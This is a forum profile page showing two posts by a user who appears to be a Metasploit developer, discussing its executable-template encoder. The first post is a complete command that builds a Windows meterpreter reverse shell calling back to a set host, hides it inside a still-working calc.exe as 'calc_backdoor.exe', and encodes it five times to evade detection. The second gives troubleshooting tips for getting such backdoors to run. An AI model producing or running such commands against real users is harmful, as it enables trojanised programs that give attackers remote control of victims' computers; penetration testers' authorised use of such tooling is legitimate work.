Jump to content

scriptjunkie

Members
  • Posts

    2
  • Joined

  • Last visited

Everything posted by scriptjunkie

  1. command: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.126 EXITFUNC=thread R | ./msfencode -t exe -x calc.exe -k -o calc_backdoor.exe -e x86/shikata_ga_nai -c 5
  2. Hey carloss, I am scriptjunkie, and I just wrote that encoding method a few weeks ago. (see https://www.metasploit.com/redmine/issues/1244 ) If it's really not working, I'd love to figure out why. Please upload your original and encoded executables. (if that doesn't work, email me, I'll message you my address if it's not already displayed somewhere) Edit: Be sure in the command to use EXITFUNC=thread. Are you using thread and not seh or process exitfunc? SEH will crash and process will kill the process. 64 bit will not work currently, but I don't know why XP 32 bit won't work. I have tested with as many exe's as I could, and solved as many bugs as I could, but some are not easily solved and I may have missed some. Did you get any error messages? Thanks, scriptjunkie
×
×
  • Create New...